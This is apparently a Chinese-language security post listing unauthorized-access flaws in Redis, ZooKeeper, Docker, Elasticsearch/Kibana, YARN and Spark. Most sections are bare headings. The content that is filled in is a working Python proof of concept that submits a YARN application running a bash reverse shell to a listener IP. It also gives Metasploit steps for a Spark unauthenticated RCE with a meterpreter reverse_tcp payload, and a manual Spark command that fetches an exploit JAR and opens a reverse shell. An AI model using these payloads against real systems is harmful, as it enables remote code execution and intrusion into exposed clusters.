[应用漏洞]总结数个未授权访问漏洞，部分可getshell

一、Redis未授权访问

二、zookeeper未授权访问

zookeeper的指令集：https://blog.csdn.net/dandandeshangni/article/details/80558383

三、docker未授权访问

四、ElasticSearch、kibana未授权访问

五、Yarn未授权访问

poc：

import requests
target = 'http://10.1.5.168:8088/'

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
print(resp.text)

app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/192.168.57.19/8899 0>&1',
        },
    },
    'application-type': 'YARN',
}
print (data)
res = requests.post(url, json=data)
print(res)

六、spark未授权访问

msf指令：

msf5>use exploit/linux/http/spark_unauth_rce
msf5>set payload java/meterpreter/reverse_tcp
msf5>set rhost 192.168.100.2
msf5>set rport 6066
msf5>set lhost 192.168.100.1
msf5>set lport 4444
msf5>set srvhost 192.168.100.1
msf5>set srvport 8080
msf5>exploit 

手动getshell：

./submit.sh ip:port 2.3.1 https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar "bash -i >& /dev/tcp/192.168.100.1/8888 0>&1"